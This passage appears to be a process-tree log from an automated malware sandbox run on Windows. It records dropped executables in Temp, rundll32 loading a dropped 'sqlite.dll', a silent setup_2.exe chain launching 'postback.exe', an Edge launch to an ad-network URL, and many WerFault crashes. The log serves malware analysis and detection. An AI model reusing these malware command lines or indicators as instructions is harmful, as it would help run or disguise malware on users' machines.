C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:25⤵PID:3736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:35⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:85⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:15⤵PID:2316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:15⤵PID:1812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:15⤵PID:2404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:15⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:15⤵PID:5412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 /prefetch:85⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 /prefetch:85⤵PID:880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:15⤵PID:3624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:85⤵PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4944 /prefetch:25⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:85⤵PID:2128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:85⤵PID:2524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:85⤵PID:5204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:15⤵PID:2224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5424 /prefetch:85⤵PID:1100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,10647777417194794076,6029350457062867273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3260 /prefetch:85⤵PID:4668
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:5912
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd5d046f8,0x7fffd5d04708,0x7fffd5d047185⤵PID:3120
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d3-b378b-a17-f62a4-26ae211b4b25a\SHyqobaetuno.exe"C:\Users\Admin\AppData\Local\Temp\d3-b378b-a17-f62a4-26ae211b4b25a\SHyqobaetuno.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1452
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1420 -ip 14201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1856 -ip 18561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4992 -ip 49921⤵PID:4800
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5408 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5456 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9UBC3.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9UBC3.tmp\setup_2.tmp" /SL5="$200B6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5532 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT2⤵
- Executes dropped EXE
PID:5608 -
C:\Users\Admin\AppData\Local\Temp\is-28F2H.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-28F2H.tmp\setup_2.tmp" /SL5="$30222,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\is-24UAP.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-24UAP.tmp\postback.exe" ss14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5760
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5456 -ip 54561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1100 -ip 11001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6112
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 5140 -ip 51401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1160 -ip 11601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5284 -ip 52841⤵PID:5764
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 3604 -ip 36041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1864
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5164 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5972 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 4523⤵
- Program crash
PID:2444
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5972 -ip 59721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3996
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 6096 -ip 60961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5780 -ip 57801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5696 -ip 56961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4788 -ip 47881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6076
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2604 -ip 26041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4208 -ip 42081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1680 -ip 16801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1608